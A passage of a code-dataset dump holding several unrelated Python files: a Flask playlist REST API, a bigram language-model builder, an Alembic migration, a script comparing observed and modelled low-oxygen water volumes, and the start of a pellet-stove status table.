app.exec()\n","repo_name":"pertsezhuisky/RTimer","sub_path":"WorkToRest.py","file_name":"WorkToRest.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"3117511410","text":"from flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\n\n#Initializing playlist app\napp = Flask(__name__)\napp.config.from_object(\"project.config.Config\")\n#Database SQLalchemy\ndb = SQLAlchemy(app) #object relation mapper\nma = Marshmallow(app) #convert object from python datatype\n\nclass Playlist(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), unique=True)\n author = db.Column(db.String(100))\n length = db.Column(db.Float)\n genre = db.Column(db.String(100))\n\n def __init__(self, name, author, length, genre):\n self.name = name\n self.author = author\n self.length = length\n self.genre = genre\n\n#Playlist Schema\nclass PlaylistSchema(ma.Schema):\n class Meta:\n fields = ('id', 'name', 'author', 'length', 'genre')\n\n#Init Schema\nplaylist_schema = PlaylistSchema()\nplaylists_schema = PlaylistSchema(many=True)\n\n#Testing route\n@app.route(\"/\")\ndef hello_world():\n return jsonify(hello=\"world\")\n\n#Add Song\n@app.route('/playlist', methods=['POST'])\ndef add_song():\n name = request.json['name']\n author = request.json['author']\n length = request.json['length']\n genre = request.json['genre']\n new_song = Playlist(name, author, length, genre)\n #to add song and save to db\n db.session.add(new_song)\n db.session.commit()\n\n return playlist_schema.jsonify(new_song)\n\n\n#Get Song\n@app.route('/playlist', methods=['GET'])\ndef get_song():\n songs = Playlist.query.all()\n output = playlists_schema.dump(songs)\n\n return jsonify(output)\n\n\n#Update Song\n@app.route('/playlist/', methods=['PUT'])\ndef update_song():\n playlist = Playlist.query.get(id)\n name = request.json['name']\n author = request.json['author']\n length = request.json['length']\n genre = request.json['genre']\n\n playlist.name = name\n playlist.author = author\n playlist.length = length\n playlist.genre = genre\n\n db.session.commit()\n\n return playlist_schema.jsonify(playlist)\n\n\n#Delete Song\n@app.route('/playlist/', methods=['DELETE'])\ndef delete_song(id):\n playlist = Playlist.query.get(id)\n db.session.delete(playlist)\n db.session.commit()\n\n return playlist_schema.jsonify(playlist)\n","repo_name":"Vshalson/PYTHON-REST-API","sub_path":"services/web/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"13422018912","text":"import sys\nimport collections\nimport math\n\n\n# Incorporates the pre-processing steps for each line in the inputFile\ndef process_input(buffer, words):\n # Split the sentences by period\n buffer.replace(\". \", \".\")\n sentences = buffer.split(\".\")\n\n # Loop through and split each word into word arrays\n for i in sentences:\n split_sentence = i.split(\" \")\n split_sentence.insert(0, \"\")\n split_sentence.append(\"\")\n # Remove any empty words\n words.append([str.lower(x) for x in split_sentence if x])\n\n\n# Removes newlines and tabs from each line read from the file\ndef process_line(self):\n line = self.replace(\"\\n\", \" \")\n line2 = line.replace(\"\\t\", \"\")\n return line2\n\n\n# Calculate the unique number of words for V\ndef calculate_v(unigrams_count):\n return len(unigrams_count)\n\n\n# Calculates mle for a bigram\ndef calculate_mle(bi, i, bigrams_count, unigrams_count, unigrams):\n if bi == ['', '']:\n return 1\n if i != -1:\n num = bigrams_count[i]\n den = unigrams_count[unigrams.index(bi[0])]\n return num / den\n else:\n return 0\n\n\n# Calculates the Laplace for a bigram\ndef calculate_laplace(bi, v, i, bigrams_count, unigrams_count, unigrams):\n neu = bigrams_count[i] + 1\n den = unigrams_count[unigrams.index(bi[0])] + v + 1\n return neu / den\n\n\n# Calculates the interpolation for a bigram\ndef calculate_inter(l, bi, mle_prob, v, all_unigrams, unigrams, unigrams_count):\n try:\n py = (unigrams_count[unigrams.index(bi[1])] + 1) / (len(all_unigrams) + v + 1)\n result = (l * mle_prob) + ((1 - l) * py)\n except ValueError:\n py = (0 + 1) / (len(all_unigrams) + v + 1)\n result = (l * mle_prob) + ((1 - l) * py)\n return result\n\n\n# For training Katz = AD\ndef calculate_ad(bi, i, bigrams_count, unigrams_count, unigrams):\n # D = 0.5\n return (bigrams_count[i] - 0.5) / unigrams_count[unigrams.index(bi[0])]\n\n\n# Writes the top bigrams to a file, excluding start and stop tags\ndef write_top_bigrams(bigrams, probs):\n with open(\"top-bigrams.txt\", 'w') as file:\n for b in bigrams:\n file.write('{}, {}\\n'.format(b, probs[bigrams.index(b)]))\n\n\ndef write_bigram(l, bigrams, bigrams_count, mle, laplace, inter, katz):\n with open(\"bigram.lm\", 'w') as file:\n index = 0\n file.write('LAMBDA {}\\n'.format(l))\n for b in bigrams:\n w1, w2, bc = b[0], b[1], bigrams_count[index]\n m, l, i, k = mle[index], laplace[index], inter[index], katz[index]\n file.write('{}, {}, {}, {}, {}, {}, {}\\n'.format(w1, w2, bc, m, l, i, k))\n index += 1\n\n\ndef write_unigram(unigrams, unigrams_count):\n with open(\"unigram.lm\", 'w') as file:\n index = 0\n for u in unigrams:\n file.write('{}, {}\\n'.format(u, unigrams_count[index]))\n index += 1\n\n\ndef fill_buffer(inputfile, buffer, words):\n # Try opening the file\n try:\n with open(inputfile, 'r') as fileObj:\n # Loop through and read the file line by line\n while True:\n line = fileObj.readline()\n if not line:\n break\n # Process the lines into a buffer\n buffer += process_line(line)\n process_input(buffer, words)\n except IOError:\n print(inputfile, \" not found\")\n\n\ndef process_dev(words, all_dev_unigrams, dev_unigrams, all_dev_bigrams, dev_bigrams):\n\n # Organize all unigrams into a list for counting\n for x in words:\n for y in x:\n all_dev_unigrams.insert(len(all_dev_unigrams), y)\n # Get rid of duplicate unigrams\n unigram_set = set(all_dev_unigrams)\n for u in unigram_set:\n dev_unigrams.append(u)\n\n # Organize all dev bigrams into a list for counting\n for x in words:\n sentence_bigrams = [x[y: y + 2] for y in range(len(x) - 1)]\n for y in sentence_bigrams:\n all_dev_bigrams.insert(len(all_dev_bigrams), y)\n if y[1] == '':\n all_dev_bigrams.insert(len(all_dev_bigrams), ['', ''])\n del all_dev_bigrams[len(all_dev_bigrams) - 1]\n del all_dev_bigrams[len(all_dev_bigrams) - 1]\n del all_dev_bigrams[len(all_dev_bigrams) - 1]\n\n # Get rid of duplicate dev bigrams\n bigrams_set = set(map(tuple, all_dev_bigrams))\n for b in bigrams_set:\n dev_bigrams.append(b)\n\n\ndef unigram_laplace(v, total_tokens, x):\n return (x + 1) / (total_tokens + v + 1)\n\n\ndef get_lambda(v, unigrams_count, all_unigrams, unigrams, bigrams, bigrams_count):\n buffer = \"\"\n words = []\n all_dev_bigrams = []\n dev_bigrams = []\n all_dev_unigrams = []\n dev_unigrams = []\n\n inputfile = \"dev.txt\"\n fill_buffer(inputfile, buffer, words)\n\n process_dev(words, all_dev_unigrams, dev_unigrams, all_dev_bigrams, dev_bigrams)\n\n # Make necessary calculations for each bigram\n # Sum all interpolated probabilities together with different lambdas\n lambdas = [0.1, 0.3, 0.5, 0.7, 0.9]\n inters = []\n for l in lambdas:\n val = 0\n for b in all_dev_bigrams:\n try:\n m = calculate_mle(b, bigrams.index(tuple(b)), bigrams_count, unigrams_count, unigrams)\n except ValueError:\n if b == ['', '']:\n m = 1\n else:\n m = 0\n # Sum all interpolation probabilities\n try:\n u = unigram_laplace(v, len(all_unigrams), unigrams_count[unigrams.index(b[1])])\n except ValueError:\n u = (0 + 1) / (len(all_unigrams) + v + 1)\n\n inter = (l * m) + ((1 - l) * u)\n if inter != 0:\n val += math.log2(inter)\n\n inters.append(val)\n\n # Multiple each value by -1/N and make exp for 2\n lower = 0\n lower_val = 0\n first = -1\n index = 0\n for inte in inters:\n inte *= (-1 / len(all_dev_unigrams))\n inte = math.pow(2, inte)\n if first == -1:\n lower = index\n lower_val = inte\n first = 0\n elif inte < lower_val:\n lower_val = inte\n lower = index\n index += 1\n return lambdas[lower]\n\n\ndef top_bigrams(laplace, v, all_unigrams, bigrams):\n joint_probs = {}\n joint_prob = []\n index = 0\n for b in bigrams:\n pl = (all_unigrams.count(b[0]) + 1) / (len(all_unigrams) + v + 1)\n k = pl * laplace[bigrams.index(b)]\n joint_prob.insert(bigrams.index(b), k)\n joint_probs.setdefault(k, []).append(bigrams.index(b))\n index += 1\n\n # Sort the bigrams by probabilities from greatest to least\n ordered_probs = dict(collections.OrderedDict(sorted(joint_probs.items(), reverse=True)))\n reverse_order = list(reversed(sorted(ordered_probs.keys())))\n count = 0\n joint20_prob = []\n joint20_bigrams = []\n for r in reverse_order:\n if count == 20:\n break\n lst = ordered_probs.get(r)\n for l in lst:\n w1 = bigrams[l][0]\n w2 = bigrams[l][1]\n if '' not in w1 and '' not in w1 and '' not in w2 and '' not in w2:\n joint20_prob.insert(count, joint_prob[l])\n joint20_bigrams.insert(count, bigrams[l])\n count += 1\n\n if count == 20:\n break\n write_top_bigrams(joint20_bigrams, joint20_prob)\n\n\n# Constructs the bigram ml to be written to a file\ndef bigram(words, v, all_unigrams, all_bigrams, bigrams_count, bigrams, unigrams_count, unigrams):\n mle = [] # Keep track of mle calculations\n laplace = []\n inter = []\n katz = []\n\n # Organize all bigrams into a list for counting\n for x in words:\n sentence_bigrams = [x[y: y + 2] for y in range(len(x) - 1)]\n for y in sentence_bigrams:\n all_bigrams.insert(len(all_bigrams), y)\n if y[1] == '':\n all_bigrams.insert(len(all_bigrams), ['', ''])\n\n del all_bigrams[len(all_bigrams) - 1]\n del all_bigrams[len(all_bigrams) - 1]\n del all_bigrams[len(all_bigrams) - 1]\n\n # Get rid of duplicate bigrams\n bigrams_set = set(map(tuple, all_bigrams))\n for b in bigrams_set:\n bigrams.append(b)\n\n # Add each bigram to the end of the list\n for b in bigrams:\n bigrams_count.append(all_bigrams.count(list(b))) # Calculate the frequency of each bigram\n\n l = get_lambda(v, unigrams_count, all_unigrams, unigrams, bigrams, bigrams_count)\n # Make necessary calculations for each bigram\n for b in bigrams:\n\n # Calculate the MLE Probability\n m = calculate_mle(b, bigrams.index(b), bigrams_count, unigrams_count, unigrams)\n mle.append(m)\n\n # Calculate the Laplace Probability\n laplace.append(calculate_laplace(b, v, bigrams.index(b), bigrams_count, unigrams_count, unigrams))\n\n # Calculate the Interpolated Probability\n inter.append(calculate_inter(l, b, m, v, all_unigrams, unigrams, unigrams_count))\n\n # Calculate the AD probability\n katz.append(calculate_ad(b, bigrams.index(b), bigrams_count, unigrams_count, unigrams))\n\n write_bigram(l, bigrams, bigrams_count, mle, laplace, inter, katz)\n return laplace\n\n\n# Constructs the unigram ml to be written to a file\ndef unigram(words, unigrams_count, all_unigrams, unigrams):\n # Organize all unigrams into a list for counting\n for x in words:\n for y in x:\n all_unigrams.insert(len(all_unigrams), y)\n # Get rid of duplicate unigrams\n unigram_set = set(all_unigrams)\n for u in unigram_set:\n unigrams.append(u)\n\n for u in unigrams:\n unigrams_count.append(all_unigrams.count(u))\n\n write_unigram(unigrams, unigrams_count)\n return calculate_v(unigrams_count)\n\n\nclass LMB:\n if __name__ == \"__main__\":\n buffer = \"\"\n words = []\n\n all_unigrams = []\n unigrams_count = []\n all_bigrams = [] # Keep track of all bigrams\n bigrams_count = [] # Keep track of the frequency of each bigram\n bigrams = [] # Keep track of unique bigrams\n unigrams = []\n\n if len(sys.argv) < 2:\n print(\"Please specify file to convert\")\n sys.exit()\n\n # Get the filename\n inputFile = sys.argv[1]\n # inputFile = \"../inputs/train.txt\"\n\n fill_buffer(inputFile, buffer, words)\n v = unigram(words, unigrams_count, all_unigrams, unigrams)\n laplace = bigram(words, v, all_unigrams, all_bigrams, bigrams_count, bigrams, unigrams_count, unigrams)\n top_bigrams(laplace, v, all_unigrams, bigrams)\n","repo_name":"mshankar13/NLP","sub_path":"hw1/lm-builder.py","file_name":"lm-builder.py","file_ext":"py","file_size_in_byte":10597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34988077088","text":"\"\"\"init\n\nRevision ID: f0a360160370\nRevises: \nCreate Date: 2023-10-30 01:00:33.980419\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f0a360160370'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=255), server_default='', nullable=False),\n sa.Column('email', sa.String(length=255), nullable=True),\n sa.Column('password', sa.String(), nullable=True),\n sa.Column('order_num', sa.Integer(), server_default='0', nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email')\n )\n op.create_table('tasks',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=255), server_default='', nullable=False),\n sa.Column('order_num', sa.Integer(), server_default='0', nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('dones',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('task_id', sa.Integer(), nullable=False),\n sa.Column('done_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),\n sa.Column('order_num', sa.Integer(), server_default='0', nullable=False),\n sa.ForeignKeyConstraint(['task_id'], ['tasks.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('dones')\n op.drop_table('tasks')\n op.drop_table('users')\n # ### end Alembic commands ###\n","repo_name":"Tomo-zou-2525/tokidokiyaru-backend","sub_path":"alembic/versions/2023_1030_0100_init.py","file_name":"2023_1030_0100_init.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31852341487","text":"\"\"\"\nFinding hypoxic depth and volume using observational data.\n\nTest on mac in ipython:\nrun assess_DO_vol -gtx cas6_v0_live -year 2017 -test False\n\n\"\"\"\n\nimport sys\nimport pandas as pd\nimport xarray as xr\nimport numpy as np\nfrom datetime import datetime\n\nfrom lo_tools import Lfun, zfun, zrfun\nfrom lo_tools import extract_argfun as exfun\nimport cast_functions as cfun\nfrom lo_tools import plotting_functions as pfun\nimport tef_fun as tfun\nimport pickle\n\nimport VFC_functions_2 as vfun\n\nfrom time import time\nfrom subprocess import Popen as Po\nfrom subprocess import PIPE as Pi\n\nfrom scipy.spatial import KDTree\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\n\nimport itertools\n\nfrom collections import defaultdict\n\nimport os\n\n\nLdir = exfun.intro() # this handles the argument passing\n\ndt = pd.Timestamp(str(Ldir['year']) + '-01-01 01:30:00')\nfn_his = cfun.get_his_fn_from_dt(Ldir, dt)\n\nmonth_num = ['01','02','03','04','05','06','07','08','09','10','11','12']\n\nmonth_str = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\n\nthreshold_val = 5 #mg/L DO\n\nvar = 'DO_mg_L'\n\nsegments = 'basins' #custom (specify string list and string build list), basins, whole domain, sound and strait\n\n# seg_build_list = optional\n \nG, S, T, land_mask, Lon, Lat, z_rho_grid, dz, dv = vfun.getGridInfo(fn_his)\n\nvol_dir, v_df, j_dict, i_dict, all_seg_list = vfun.getSegmentInfo(Ldir)\n\ninfo_df_dir = (Ldir['LOo'] / 'obs' / 'vfc')\n\ndf_dir = (Ldir['LOo'] / 'obs' / 'vfc' )\n\ninfo_fn = (info_df_dir / ('info_' + str(Ldir['year']) + '.p'))\n\nfn = (df_dir / (str(Ldir['year']) + '.p'))\n\n\n# %%\n\n\njjj_dict, iii_dict, seg_list = vfun.defineSegmentIndices(segments, j_dict, i_dict)\n\n# %%\n\ninfo_df = vfun.getCleanInfoDF(info_fn, land_mask, Lon, Lat, seg_list, jjj_dict, iii_dict)\n\ndf = vfun.getCleanDF(fn, info_df)\n\n# %%\n\ninfo_df['month'] = info_df['time'].dt.month\n\ndf['month'] = df['time'].dt.month\n\n# %%\n\nsub_thick_LO_his = {}\n\nsub_thick_LO_casts = {}\n\nsub_thick_obs = {}\n\nsub_vol_LO_his = {}\n\nsub_vol_LO_casts = {}\n\nsub_vol_obs = {}\n\nsub_thick_obs = {}\n\nii_casts = {}\n\njj_casts = {}\n\ncid_dict = {}\n\nsurf_casts_array = {}\n\nsub_casts_array_obs = {}\n\nsub_casts_array_LO_casts = {}\n\n# %%\n\n\nfor seg_name in seg_list:\n \n jjj = jjj_dict[seg_name]\n \n iii = iii_dict[seg_name]\n \n sub_thick_LO_his[seg_name] = {}\n\n sub_thick_LO_casts[seg_name] = {}\n\n sub_thick_obs[seg_name] = {}\n\n sub_vol_LO_his[seg_name] = {}\n\n sub_vol_LO_casts[seg_name] = {}\n \n sub_vol_obs[seg_name] = {}\n\n sub_thick_obs[seg_name] = {}\n\n ii_casts[seg_name] = {}\n\n jj_casts[seg_name] = {}\n \n cid_dict[seg_name] = {}\n \n surf_casts_array[seg_name] = {}\n \n sub_casts_array_obs[seg_name] = {}\n \n sub_casts_array_LO_casts[seg_name] = {}\n\n \n for (mon_num, mon_str) in zip(month_num, month_str):\n \n dt = pd.Timestamp(str(Ldir['year']) + '-'+mon_num+'-01 01:30:00')\n fn_his = cfun.get_his_fn_from_dt(Ldir, dt)\n \n G, S, T, land_mask, Lon, Lat, z_rho_grid, dz, dv = vfun.getGridInfo(fn_his)\n \n sub_vol_LO_his[seg_name][int(mon_num)], sub_thick_LO_his[seg_name][int(mon_num)] = vfun.getLOHisSubVolThick(dv, dz, fn_his, jjj, iii, var, threshold_val)\n \n info_df_use = info_df[(info_df['segment'] == seg_name) & (info_df['month'] == int(mon_num))]\n \n df_use = df[(df['segment'] == seg_name) & (df['month'] == int(mon_num))]\n \n sub_vol_obs[seg_name][int(mon_num)], sub_thick_obs[seg_name][int(mon_num)], surf_casts_array[seg_name][int(mon_num)], sub_casts_array_obs[seg_name][int(mon_num)] = vfun.getOBSCastsSubVolThick(info_df_use, df_use, var, threshold_val, z_rho_grid, dv, dz, land_mask, jjj, iii)\n \n jj_casts[seg_name][int(mon_num)] = info_df_use['jj_cast'].to_numpy()\n \n ii_casts[seg_name][int(mon_num)] = info_df_use['ii_cast'].to_numpy()\n \n cid_dict[seg_name][int(mon_num)] =info_df_use.index.to_numpy()\n \n vfun.extractLOCasts(Ldir, info_df_use, fn_his)\n \n sub_vol_LO_casts[seg_name][int(mon_num)], sub_thick_LO_casts[seg_name][int(mon_num)], sub_casts_array_LO_casts[seg_name][int(mon_num)] = vfun.getLOCastsSubVolThick(Ldir, info_df_use, var, threshold_val, z_rho_grid, dv, dz, land_mask, jjj, iii, surf_casts_array[seg_name][int(mon_num)])\n \n print(seg_name + mon_str)\n \n\n\n# %% \n\nseg_list = ['Whidbey Basin']\n\nfor seg_name in seg_list:\n \n jjj = jjj_dict[seg_name]\n iii = iii_dict[seg_name]\n \n \n min_lat = Lat[min(jjj) - 10]\n max_lat = Lat[max(jjj) + 10]\n \n min_lon = Lon[min(iii) - 10]\n max_lon = Lon[max(iii) + 10] \n \n \n for (mon_num, mon_str) in zip(month_num,month_str):\n \n pfun.start_plot(fs=14, figsize=(16,18))\n fig0, axes0 = plt.subplots(nrows=2, ncols=1, squeeze=False)\n \n c0 = axes0[0,0].pcolormesh(Lon[np.unique(iii)],Lat[np.unique(jjj)], sub_thick_LO_his[seg_name][int(mon_num)], cmap='Blues', alpha = 0.8, vmin = 0, vmax = 300)\n \n axes0[0,0].set_xlim([min_lon,max_lon])\n axes0[0,0].set_ylim([min_lat,max_lat])\n axes0[0,0].tick_params(labelrotation=45)\n axes0[0,0].set_title('LO ' + mon_str + ' ' + str(Ldir['year']) + ' ' + seg_name + ' Sub-' + str(threshold_val) + ' mg/L DO')\n pfun.add_coast(axes0[0,0])\n \n \n c1 = axes0[1,0].pcolormesh(Lon[np.unique(iii)],Lat[np.unique(jjj)], sub_thick_obs[seg_name][int(mon_num)], cmap='Greens', alpha = 0.8, vmin = 0, vmax = 300)\n \n for n in range(len(ii_casts[seg_name][int(mon_num)])):\n \n axes0[1,0].plot(Lon[int(ii_casts[seg_name][int(mon_num)][n])],Lat[int(jj_casts[seg_name][int(mon_num)][n])],'o', c = 'white', markeredgecolor='black', markersize=10)\n \n \n axes0[1,0].set_xlim([min_lon,max_lon])\n axes0[1,0].set_ylim([min_lat,max_lat])\n axes0[1,0].tick_params(labelrotation=45)\n axes0[1,0].set_title('Obs VFC ' + mon_str + ' ' + str(Ldir['year'])+ ' ' + seg_name + ' Sub-' + str(threshold_val) + ' mg/L DO')\n pfun.add_coast(axes0[1,0])\n \n \n # c1 = axes0[1,0].pcolormesh(Lon[np.unique(iii)],Lat[np.unique(jjj)], sub_thick_LO_casts[seg_name][int(mon_num)], cmap='Purples', alpha = 0.8, vmin = 0, vmax = 300)\n \n # for n in range(len(ii_casts[seg_name][int(mon_num)])):\n \n # axes0[1,0].plot(Lon[int(ii_casts[seg_name][int(mon_num)][n])],Lat[int(jj_casts[seg_name][int(mon_num)][n])],'o', c = 'white', markeredgecolor='black', markersize=10)\n \n \n # axes0[1,0].set_xlim([min_lon,max_lon])\n # axes0[1,0].set_ylim([min_lat,max_lat])\n # axes0[1,0].tick_params(labelrotation=45)\n # axes0[1,0].set_title('LO VFC ' + mon_str + ' ' + str(Ldir['year'])+ ' ' + seg_name + ' Sub-' + str(threshold_val) + ' mg/L DO')\n # pfun.add_coast(axes0[1,0])\n \n \n # c2 = axes0[2,0].pcolormesh(Lon[np.unique(iii)],Lat[np.unique(jjj)], sub_thick_obs[seg_name][int(mon_num)], cmap='Greens', alpha = 0.8, vmin = 0, vmax = 300)\n \n # for n in range(len(ii_casts[seg_name][int(mon_num)])):\n \n # axes0[2,0].plot(Lon[int(ii_casts[seg_name][int(mon_num)][n])],Lat[int(jj_casts[seg_name][int(mon_num)][n])],'o', c = 'white', markeredgecolor='black', markersize=10)\n \n \n # axes0[2,0].set_xlim([min_lon,max_lon])\n # axes0[2,0].set_ylim([min_lat,max_lat])\n # axes0[2,0].tick_params(labelrotation=45)\n # axes0[2,0].set_title('Obs VFC ' + mon_str + ' ' + str(Ldir['year'])+ ' ' + seg_name + ' Sub-' + str(threshold_val) + ' mg/L DO')\n # pfun.add_coast(axes0[2,0])\n \n fig0.colorbar(c0,ax=axes0[0,0], label = 'Subthreshold Thickness [m]')\n \n fig0.colorbar(c1,ax=axes0[1,0], label = 'Subthreshold Thickness [m]')\n \n #fig0.colorbar(c2,ax=axes0[2,0], label = 'Subthreshold Thickness [m]')\n \n fig0.tight_layout()\n plt.savefig('/Users/dakotamascarenas/Desktop/pltz/'+seg_name + '_sub_thick_'+str(threshold_val)+'_mg_L_DO_casts_' + str(Ldir['year']) + '_00' + mon_num+'.png')\n\n \n \n# %%\n\npfun.start_plot(fs=14, figsize=(16,9))\nfig1, axes1 = plt.subplots(nrows=1, ncols=1, squeeze=False)\nplt.grid()\n\nfor seg_name in seg_list:\n\n # vol_LO = sub_vol_LO_his[seg_name]\n \n # vol_LO = sorted(vol_LO.items())\n \n # x_LO, y_LO = zip(*vol_LO)\n \n # #x_LO = int(x_LO)\n \n # y_LO = np.multiply(y_LO, 1e-9)\n \n # plt.plot(x_LO,y_LO,label = 'LO', linestyle = '--')\n\n # vol_casts = sub_vol_LO_casts[seg_name]\n \n # vol_casts = sorted(vol_casts.items())\n \n # x_casts, y_casts = zip(*vol_casts)\n \n # # x_obs = int(x_obs)\n \n # y_casts = np.multiply(y_casts, 1e-9)\n \n # plt.plot(x_casts,y_casts,label = seg_name, linestyle = '-.')\n\n vol_obs = sub_vol_obs[seg_name]\n \n vol_obs = sorted(vol_obs.items())\n \n x_obs, y_obs = zip(*vol_obs)\n \n # x_obs = int(x_obs)\n \n y_obs = np.multiply(y_obs, 1e-9)\n \n plt.plot(x_obs,y_obs,label = seg_name)\n \n \naxes1[0,0].set_xlabel('Months (2017)')\n \naxes1[0,0].set_ylabel('Sub-'+str(threshold_val)+' mg/L DO Volume [km^3]')\n\nplt.legend()\n\nplt.savefig('/Users/dakotamascarenas/Desktop/pltz/'+ str(Ldir['year']) +'_sub_vol_'+str(threshold_val)+'_mg_L_DO.png')\n\n# %%\n\nimport math\n\nnorm_RMSE_dict = {}\n\nplt.close('all')\n\npfun.start_plot(fs=14, figsize=(10,10))\n\nfig2, axes2 = plt.subplots(nrows=1, ncols=1, squeeze=False)\n\nfor seg_name in seg_list:\n \n cmap = cm.get_cmap('twilight', 12)\n \n y_LO = []\n\n y_obs = [] \n \n d = 0 \n \n for (mon_num, mon_str) in zip(month_num, month_str):\n \n #dt = pd.Timestamp('2022-' + mon_num +'-01 01:30:00')\n \n axes2[0,0].plot(sub_vol_obs[seg_name][int(mon_num)]*1e-9, sub_vol_LO_his[seg_name][int(mon_num)]*1e-9, 'o', c=cmap(d), markersize = 10, label = mon_str)\n \n d+=1\n \n y_LO.append(sub_vol_LO_his[seg_name][int(mon_num)]*1e-9)\n \n y_obs.append(sub_vol_obs[seg_name][int(mon_num)]*1e-9)\n \n y_LO = np.array(y_LO)\n \n y_obs = np.array(y_obs)\n \n x_1 = np.linspace(0, max(y_LO))\n \n y_1 = x_1\n \n axes2[0,0].plot(x_1,y_1, color = 'grey', alpha = 0.5)\n \n MSE = np.square(abs(np.subtract(y_obs,y_LO))).mean() # CHECK ON ABS\n \n RMSE = math.sqrt(MSE)\n \n norm_RMSE = RMSE/(y_obs.max()-y_obs.min())\n \n norm_RMSE_dict[seg_name] = norm_RMSE\n \n axes2[0,0].set_xlabel('Obs Sub 5 mg/L Vol [km^3]')\n axes2[0,0].set_ylabel('LO Sub 5 mg/L [km^3]')\n axes2[0,0].set_title(seg_name + ' Vol Comparison, Norm RMSE = '+str(round(norm_RMSE,3)))\n #n_c += 1\n \nhandles, labels = axes2[0,0].get_legend_handles_labels()\nfig2.legend(handles, labels, bbox_to_anchor=(0, -0.2, 1, 0.2), loc=\"upper left\",\n mode=\"expand\", borderaxespad=0, ncol=12) #loc='upper center')\n \nfig2.tight_layout()\nplt.savefig('/Users/dakotamascarenas/Desktop/pltz/comp_vol_'+seg_name+'.png',bbox_inches='tight')\n \n \n \n \n \n# %%\n\nimport pickle\n\nfile_dir = '/Users/dakotamascarenas/Desktop/'\n\n\nwith open((file_dir + 'sub_casts_array_LO_casts.pkl'), 'wb') as f: \n pickle.dump(sub_casts_array_LO_casts, f)\n\nwith open((file_dir + 'sub_casts_array_obs.pkl'), 'wb') as f: \n pickle.dump(sub_casts_array_obs, f) \n\nwith open((file_dir + 'sub_thick_LO_casts.pkl'), 'wb') as f: \n pickle.dump(sub_thick_LO_casts, f)\n\nwith open((file_dir + 'sub_thick_LO_his.pkl'), 'wb') as f: \n pickle.dump(sub_thick_LO_his, f) \n \nwith open((file_dir + 'sub_thick_obs.pkl'), 'wb') as f: \n pickle.dump(sub_thick_obs, f)\n\nwith open((file_dir + 'sub_vol_LO_casts.pkl'), 'wb') as f: \n pickle.dump(sub_vol_LO_casts, f) \n\nwith open((file_dir + 'sub_vol_LO_his.pkl'), 'wb') as f: \n pickle.dump(sub_vol_LO_his, f)\n\nwith open((file_dir + 'sub_vol_obs.pkl'), 'wb') as f: \n pickle.dump(sub_vol_obs, f) \n \nwith open((file_dir + 'surf_casts_array.pkl'), 'wb') as f: \n pickle.dump(surf_casts_array, f) \n \nwith open((file_dir + 'jj_casts.pkl'), 'wb') as f: \n pickle.dump(jj_casts, f)\n\nwith open((file_dir + 'ii_casts.pkl'), 'wb') as f: \n pickle.dump(ii_casts, f) \n \nwith open((file_dir + 'cid_dict.pkl'), 'wb') as f: \n pickle.dump(cid_dict, f) \n \n\n\n# %%\n\n","repo_name":"dakotamm/LO_user","sub_path":"archive/assess_DO_vol.py","file_name":"assess_DO_vol.py","file_ext":"py","file_size_in_byte":12671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"195073885","text":"#coding: utf-8\n\n'''\nTables des correspondances\n\n\tLe rang 0 correspond à la position de l'information dans la trame MAESTRO\n\tLe rang 1 correspond a l'intitulé publié sur le broker\n\tLe rang 2 (optionnel) permet de remplacer le code de la trame par une information texte correspondante\n\n'''\nRecuperoInfo=[\n\t[1,\"Etat du poêle\",[\n\t\t\t\t\t\t[0, \"Eteint\"],\n\t\t\t\t\t\t[1, \"Controle du poele froid / chaud\"],\n\t\t\t\t\t\t[2, \"Clean Froid\"],\n\t\t\t\t\t\t[3, \"Load Froid\"],\n\t\t\t\t\t\t[4, \"Start 1 Froid\"],\n\t\t\t\t\t\t[5, \"Start 2 Froid\"],\n\t\t\t\t\t\t[6, \"Clean Chaud\"],\n\t\t\t\t\t\t[7, \"Load Chaud\"],\n\t\t\t\t\t\t[8, \"Start 1 chaud\"],\n\t\t\t\t\t\t[9, \"Start 2 chaud\"],\n\t\t\t\t\t\t[10, \"Stabilisation\"],\n\t\t\t\t\t\t[11, \"Puissance 1\"],\n\t\t\t\t\t\t[12, \"Puissance 2\"],\n\t\t\t\t\t\t[13, \"Puissance 3\"],\n\t\t\t\t\t\t[14, \"Puissance 4\"],\n\t\t\t\t\t\t[15, \"Puissance 5\"],\n\t\t\t\t\t\t[30, \"Mode diagnostique\"],\n\t\t\t\t\t\t[31, \"Marche\"],\n\t\t\t\t\t\t[40, \"Extinction\"],\n\t\t\t\t\t\t[41, \"Refroidissement en cours\"],\n\t\t\t\t\t\t[42, \"Nettoyage basse 